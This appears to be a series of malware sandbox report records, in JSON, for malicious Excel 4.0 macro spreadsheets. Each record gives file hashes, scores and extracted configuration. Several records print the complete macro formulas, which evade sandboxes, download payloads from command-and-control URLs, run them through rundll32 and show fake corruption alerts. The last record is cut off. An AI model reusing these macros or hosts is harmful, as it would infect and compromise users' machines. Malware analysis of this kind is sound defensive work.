{"version":"0.2","sample":{"sample":"","kind":"file","target":"23261a1a7158206f901578d6366fef55dde0695df6fe994736bb606e9cc27fd3"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"23261a1a7158206f901578d6366fef55dde0695df6fe994736bb606e9cc27fd3","filesize":144384,"md5":"de1249ce180bff3b42c9eb070db3381d","sha1":"efed2f57aa02029943de5995f9e287973e164056","sha256":"23261a1a7158206f901578d6366fef55dde0695df6fe994736bb606e9cc27fd3","sha512":"049085352027e9794b0b56a3dc10e49a9265e1581049b18f21787a43ede426758b75abcbb420cea3ff0384370332c860a39c958ab7e7076817e129e04f81c443","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"23261a1a7158206f901578d6366fef55dde0695df6fe994736bb606e9cc27fd3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"e6wUw0J2k0\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2326d0f86af8df4e4d264291a7b5d189839277057a7f0c5cc7502e3a3506d460"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"2326d0f86af8df4e4d264291a7b5d189839277057a7f0c5cc7502e3a3506d460","filesize":185344,"md5":"c0fec1e43fb96d8d78c3b388e5dd9185","sha1":"80894a88c80fc0a4e12ac848523a94a01b324c3e","sha256":"2326d0f86af8df4e4d264291a7b5d189839277057a7f0c5cc7502e3a3506d460","sha512":"8d9e9efd16d9d21d4dd420f480c5b4e3ed4aaf0a23083afab017229c9b44fbd04571c16c1d73a5495bc4d1047657ec890a153e1a928bfc864ff1c35fd0048b52","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2326d0f86af8df4e4d264291a7b5d189839277057a7f0c5cc7502e3a3506d460.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"232d03c63f6b9471a97d20df8c241fae095a32d66c503827911093304f118784"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"232d03c63f6b9471a97d20df8c241fae095a32d66c503827911093304f118784","filesize":168960,"md5":"cb610ceeea6871269f2de99a0ae189f5","sha1":"e389720516255c44a725d15c7bc52f0281e53176","sha256":"232d03c63f6b9471a97d20df8c241fae095a32d66c503827911093304f118784","sha512":"842879535c38a5d7244f4708522993c591553b05f7218815437e020460fb94fef0e884aee9b76c2b0f8b4e2c404bcf257d6a6bb54ae1b4a182da5eeabac48183","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"232d03c63f6b9471a97d20df8c241fae095a32d66c503827911093304f118784.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AAKhIU7qPb\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"232f6b50792090d49a0f3f8a297dc7b11ed92234aecbf98b7767fe90aa1a10b9"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"232f6b50792090d49a0f3f8a297dc7b11ed92234aecbf98b7767fe90aa1a10b9","filesize":168960,"md5":"517da2b2d444307ddc8336c3d69ba1d8","sha1":"5026ecb4d1e68b1483a3826249c3d6cdcfff3dcd","sha256":"232f6b50792090d49a0f3f8a297dc7b11ed92234aecbf98b7767fe90aa1a10b9","sha512":"baa1d9e9b9496bf05f16c57e811aeb4e793b83babdcfd6c52319fc111ee90fc6cef885fcf8c3d2546b11fbb790fd9cf64a07d129c713a6dbcb953f420ec5520e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"232f6b50792090d49a0f3f8a297dc7b11ed92234aecbf98b7767fe90aa1a10b9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"plYdwxyLwQ\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"235c7067d11215e94de4a8d997f7b7952936584646dfceda711a891d41fc7376"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"235c7067d11215e94de4a8d997f7b7952936584646dfceda711a891d41fc7376","filesize":112640,"md5":"bdf48a1c0342b76356e590fb489af49d","sha1":"e88a33916b2e41baf832ad767f0248b16cd636d1","sha256":"235c7067d11215e94de4a8d997f7b7952936584646dfceda711a891d41fc7376","sha512":"a638764eb77e04623c4fc51a181b38bf46862a2b4d742e49c2b439522b844c3fb2510b8ea8a0293db1e7fff1da9fd1db3763fa65edd5501f1ce543ab145eaffd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"235c7067d11215e94de4a8d997f7b7952936584646dfceda711a891d41fc7376.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"235cd3d410d1ec15a5aca21eb9c10f72e792bb83c876d20418999b2a998accaa"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"235cd3d410d1ec15a5aca21eb9c10f72e792bb83c876d20418999b2a998accaa","filesize":206336,"md5":"01fd34ade6295a2d70e257c8260827de","sha1":"798203dc2a4ab58c9ed1fd64877928a421b64abf","sha256":"235cd3d410d1ec15a5aca21eb9c10f72e792bb83c876d20418999b2a998accaa","sha512":"7d0171fa50b39eba4ce32f0aaf73c6c445782010c1ae2174a91fe037875cbddcb1b353aab96c8ba43ecc3a07fe3168b125533d34ee7b9a33cc9cfe0e36ec2f3b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"235cd3d410d1ec15a5aca21eb9c10f72e792bb83c876d20418999b2a998accaa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"O5uDl97cP4\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"235eb256ed7ae19423023c1731e4823489fcb4f252e3722365470b872ad00fc3"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"235eb256ed7ae19423023c1731e4823489fcb4f252e3722365470b872ad00fc3","filesize":270848,"md5":"068e9fc9a69b50b05a9ece630c1dc80d","sha1":"d0e72785261ade24492557d4dbf6756e68740ce8","sha256":"235eb256ed7ae19423023c1731e4823489fcb4f252e3722365470b872ad00fc3","sha512":"426a814ff01d29b557daa363071dd08d2ed2dabc1ce2eca3945b2ef51df3eeb9d18928166146526a0b4ab67225618668b744cda7a433b2f4328a5c810ad08cf7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"235eb256ed7ae19423023c1731e4823489fcb4f252e3722365470b872ad00fc3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"FILE.CLOSE(FALSE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"2363ac8d74e9957938dfe3a0e75d9660928b8d49c8633028f14d2d7dab319a57"},"analysis":{"reported":"2020-04-09T16:15:19Z","score":10},"files":[{"filename":"2363ac8d74e9957938dfe3a0e75d9660928b8d49c8633028f14d2d7dab319a57","filesize":109568,"md5":"194092a2e43cb658754d7069aec10121","sha1":"27ea1068b515ac670cb86f305787c1b197e4f550","sha256":"2363ac8d74e9957938dfe3a0e75d9660928b8d49c8633028f14d2d7dab319a57","sha512":"f8277882b94416904d1c4d565dd3d70e1179839ec1c6cf890dc1142946de172f9885354539b270513cae5f70a123c82e38cd6b914aaaf8b53b40c854e47c35f7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"2363ac8d74e9957938dfe3a0e75d9660928b8d49c8633028f14d2d7dab319a57.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"tXQlVN5sIb\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"237b3c03f707a28045808532b7d67d578abc8b1c65cd4e562c94cb27a619d4f8"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"237b3c03f707a28045808532b7d67d578abc8b1c65cd4e562c94cb27a619d4f8","filesize":206336,"md5":"1f7c8afb5c7f6fa6edab7cbe7cb024dc","sha1":"8911970e96341f3537e6375b651ddbf7cf2050d9","sha256":"237b3c03f707a28045808532b7d67d578abc8b1c65cd4e562c94cb27a619d4f8","sha512":"ca5872ac9bce0745740d741cf6598fa942e5c3d002bf8edda84de68a2653ccf8d95060fcec81b4eb916efbd0b4419a6297f11963444a1443d67dc24671032057","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"237b3c03f707a28045808532b7d67d578abc8b1c65cd4e562c94cb27a619d4f8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"aIvkHMqVuu\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"237bc0092638dd079616f6e2ff9b9e786f35b13b014d8d909db0759f44eac671"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"237bc0092638dd079616f6e2ff9b9e786f35b13b014d8d909db0759f44eac671","filesize":206336,"md5":"e3326b1978b7696d63e63421b03249b3","sha1":"cad636b26a89978e9adc8c86470e52674e877101","sha256":"237bc0092638dd079616f6e2ff9b9e786f35b13b014d8d909db0759f44eac671","sha512":"9247768ee093d59aea9a6e69f8ef76e2dcd56d9cfb745318e27befd08dd741db86ea12c2187caf4f3da74eda7edbae953a7f4e617849889118931b63dab75412","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"237bc0092638dd079616f6e2ff9b9e786f35b13b014d8d909db0759f44eac671.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"y9aVptqP0E\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"23948ad1580d2e4dec335d97194a83f8b8af4b2b20962781ceb22035eccbd8ba"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"23948ad1580d2e4dec335d97194a83f8b8af4b2b20962781ceb22035eccbd8ba","filesize":206336,"md5":"ae60b10188a3858568bdbfee4f65a73b","sha1":"01073bbed5baa230a1c5a4dad7e26cebf2bce648","sha256":"23948ad1580d2e4dec335d97194a83f8b8af4b2b20962781ceb22035eccbd8ba","sha512":"f25d088047984f073620941a21252d4bd242056d24ab42ee38d1b0b450d3ddcd8c2ef9700940d8a749e5368ec9edfebd276e10271fd70896c23f0fba483fc4b8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"23948ad1580d2e4dec335d97194a83f8b8af4b2b20962781ceb22035eccbd8ba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uAGjLnVXyc\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"23a4d50a6ae98cd86b466ef5c9ec5ed708d758b9d60eba3dc125c99d044f528d"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"23a4d50a6ae98cd86b466ef5c9ec5ed708d758b9d60eba3dc125c99d044f528d","filesize":167424,"md5":"88575d7e2bfaefa0b37b962cfc680b0e","sha1":"3b9ce7405cd7998d6dbc4744668ba9b2a7a48d6c","sha256":"23a4d50a6ae98cd86b466ef5c9ec5ed708d758b9d60eba3dc125c99d044f528d","sha512":"e03ccd192ecf637e911ac5460c0ed2115859f2bafef441274fd52cd87cb9ea3541652d79ae9790c4835b39967acaa4c4d3605045bed7c13e638b94e5030ac1dc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"23a4d50a6ae98cd86b466ef5c9ec5ed708d758b9d60eba3dc125c99d044f528d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"Dk8szr07P8\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"23b3317c664412fcbc3a56fc8df3d316d8a41b5235a8200025b59e79ab632486"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"23b3317c664412fcbc3a56fc8df3d316d8a41b5235a8200025b59e79ab632486","filesize":209920,"md5":"407ed78fd890494db678b74293376cf3","sha1":"5b86360e99a694a09b451daaed67f6c073e85745","sha256":"23b3317c664412fcbc3a56fc8df3d316d8a41b5235a8200025b59e79ab632486","sha512":"bc0afa335dfdecf854e566d39c37c25526ca49b98b1e9e5b21a4217067074648b2025e0c1e1c79a9a81d0615426129bc0a486ce043cdb90dd52bd2db3655255f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"23b3317c664412fcbc3a56fc8df3d316d8a41b5235a8200025b59e79ab632486.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1blGijsgwY\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"23b69d56f7786c5c7e8de050b32fba15d328c83184a14f19c4f2a4e7b0dc35f7"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"23b69d56f7786c5c7e8de050b32fba15d328c83184a14f19c4f2a4e7b0dc35f7","filesize":167936,"md5":"21a5b0612d1f34eef767baedab8571f4","sha1":"024a50d67e252a6dd81f3fd5c4ebac361d325e8d","sha256":"23b69d56f7786c5c7e8de050b32fba15d328c83184a14f19c4f2a4e7b0dc35f7","sha512":"9420a70cdae025e7c6a0bd238945226152ac528cd38a49fb55fb68c725585808444f650dcd00b3b872b7d087e31a50b53d0e2346631b1a35001ebf648088c6e7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"23b69d56f7786c5c7e8de050b32fba15d328c83184a14f19c4f2a4e7b0dc35f7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FEBJPYia1o\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"23b715f1dc914669c13715f3b2d9ddcb93565e20dd32367813af011900b91d1b"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"23b715f1dc914669c13715f3b2d9ddcb93565e20dd32367813af011900b91d1b","filesize":177152,"md5":"5f729c1408b1be307b8baf6220315bee","sha1":"6583ee7b95ea0a542d6fb838b503a3314aaa663a","sha256":"23b715f1dc914669c13715f3b2d9ddcb93565e20dd32367813af011900b91d1b","sha512":"c4a72d70b9ef06753118ea011e2f24998548c2cd13bf71ce5916f384cfefc09189f05a6ca183a32d638d461a3b0102b377a46032f594be6d62b7e30cb0d20d3c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"23b715f1dc914669c13715f3b2d9ddcb93565e20dd32367813af011900b91d1b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"3bjMh0dxgD\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"23bc442e06e60543451a214970ea499e5a6f010a58175e87960bf4318966d056"},"analysis":{"reported":"2020-04-09T16:15:20Z","score":10},"files":[{"filename":"23bc442e06e60543451a214970ea499e5a6f010a58175e87960bf4318966d056","filesize":168448,"md5":"0a6c7ae4fe603522c9a0f8fdc7236ea9","sha1":"63ae0e2bde959e22f0545d13d76a7a992c7311c1","sha256":"23bc442e06e60543451a214970ea499e5a6f010a58175e87960bf4318966d056","sha512":"1d8d38db0cea435b5044877e4dee5c9812c755f34a1ff155fbb17a66cb580123f3b4983c067279fdced92f995ffbb52c9a998f2b7d9fdbbc3335af56eaccebe1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"23bc442e06e60543451a214970ea499e5a6f010a58175e87960bf4318966d056.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), 